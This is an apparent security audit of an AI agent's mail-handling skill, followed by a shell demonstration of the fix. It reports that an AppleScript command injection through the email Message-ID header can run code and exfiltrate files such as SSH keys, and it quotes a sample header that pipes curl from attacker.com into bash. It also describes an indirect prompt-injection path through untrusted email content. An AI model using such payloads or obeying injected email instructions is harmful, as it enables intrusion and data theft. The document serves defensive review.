Gen Agent Trust Hub audit: skills/htlin222/dotfiles/mail

Skill: mail

Result: Fail

Audited by Gen Agent Trust Hub on May 2, 2026

Risk Level: HIGH. Categories: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The scripts extract-urls.sh and extract-attachment.sh are vulnerable to command injection via malicious email headers.
  • Evidence: In both shell scripts, the $MESSAGE_ID variable (extracted from incoming emails) is interpolated directly into an osascript -e command string without sanitization: osascript -e "... set targetId to \"$MESSAGE_ID\" ...".
  • Impact: An attacker can send an email whose Message-ID header carries an AppleScript expression, e.g. dummy" & (do shell script "curl http://attacker.com/payload | bash") & ". Because the shell expands $MESSAGE_ID inside the double-quoted -e argument, the header's quotes close the AppleScript string literal and the do shell script call becomes part of the program. When the skill processes that email to extract URLs or attachments, the injected command runs with the user's privileges; no action by the user beyond letting the skill read the message is required.
  • [DATA_EXFILTRATION]: The command injection vulnerability identified above provides a direct path for the silent exfiltration of sensitive local data.
  • Evidence: Once an attacker-controlled Message-ID has turned into do shell script, the same call can read and transmit private files, such as ~/.ssh/id_rsa or Mail.app's local message store, to a remote server.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection (Category 8).
  • Ingestion points: Untrusted email content (subject, sender, body, and extracted URLs) is fetched by fetch-mail.applescript and extract-urls.sh and handed to the agent.
  • Boundary markers: The skill's instructions neither delimit the email content as untrusted data nor tell the agent to ignore instructions embedded in it.
  • Capability inventory: The skill has access to shell execution (osascript, bash), file system modification (Write tool), and system automation (Mail, Reminders).
  • Sanitization: Nothing filters or sanitizes the email content before the LLM uses it for action classification and reminder creation.
  • Impact: Instructions embedded in a processed email could steer the agent into creating misleading reminders, exfiltrating information through its tool calls, or ignoring its safety constraints.
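The COMMAND_EXECUTION finding above, reproduced and fixed as an added example. This is not code from the htlin222/dotfiles mail skill: the AppleScript is a minimal stand-in for the `set targetId to \"$MESSAGE_ID\"` line in extract-urls.sh and extract-attachment.sh, and the function names and sample headers are hypothetical. It shows why the crafted header changes the program's structure, then contrasts two fixes: a strict allowlist on the header value, and passing the value to osascript as an argument instead of splicing it into the source text.

```shell
#!/bin/sh
# Added example, not the skill's own code. Reproduces the audit's
# injection with a minimal AppleScript stand-in and shows two fixes.
# Function names and sample headers are hypothetical.

# Constructed sample headers (not real mail).
BENIGN_ID='<20260502153100.12345@example.com>'
MALICIOUS_ID='dummy" & (do shell script "curl http://attacker.com/payload | bash") & "'

# Vulnerable: builds the AppleScript source exactly as a line like
#   osascript -e "... set targetId to \"$MESSAGE_ID\" ..."
# would, i.e. the header value becomes part of the program text.
vulnerable_script() {
    printf 'set targetId to "%s"\n' "$1"
}

# Count double quotes in the generated source. The template contributes
# exactly two; anything beyond that came from the header and has
# reshaped the program (closed the literal, added an expression).
quote_count() {
    awk -F'"' '{ n += NF - 1 } END { print n + 0 }'
}

# Allowlist for Message-ID values. Deliberately narrower than RFC 5322's
# msg-id grammar: quotes, parentheses, spaces and backslashes are
# rejected, which removes every character needed to leave the literal.
valid_message_id() {
    printf '%s' "$1" | grep -Eq '^<?[A-Za-z0-9._%+=-]+@[A-Za-z0-9._-]+>?$'
}

# Safe: validate first, then hand the value to osascript as argv so it
# is only ever a string inside the script and is never parsed as
# AppleScript. On hosts without osascript (CI, Linux) the invocation
# is printed instead of executed.
safe_extract() {
    id="$1"
    if ! valid_message_id "$id"; then
        printf 'rejected Message-ID: %s\n' "$id" >&2
        return 1
    fi
    if command -v osascript >/dev/null 2>&1; then
        osascript - "$id" <<'EOF'
on run argv
    set targetId to item 1 of argv
    return targetId
end run
EOF
    else
        printf 'would run: osascript - %s  (value passed as argv, not as source)\n' "$id"
    fi
}

# Demo: benign header leaves 2 quotes in the source, crafted header 6.
printf 'benign  quotes in source: %s\n' "$(vulnerable_script "$BENIGN_ID" | quote_count)"
printf 'crafted quotes in source: %s\n' "$(vulnerable_script "$MALICIOUS_ID" | quote_count)"
vulnerable_script "$MALICIOUS_ID"
safe_extract "$BENIGN_ID"
safe_extract "$MALICIOUS_ID" || true
```

The argv route is the structural fix: `osascript - arg...` reads the program from stdin and exposes the extra arguments to `on run argv`, so the header value reaches the script as data and the shell never has to quote it into program text. The allowlist is defense in depth for the rest of the pipeline, since the same value is likely to be reused in a later shell or AppleScript string, and rejecting it at ingestion is cheaper than escaping it correctly everywhere.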
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: May 2, 2026, 03:31 PM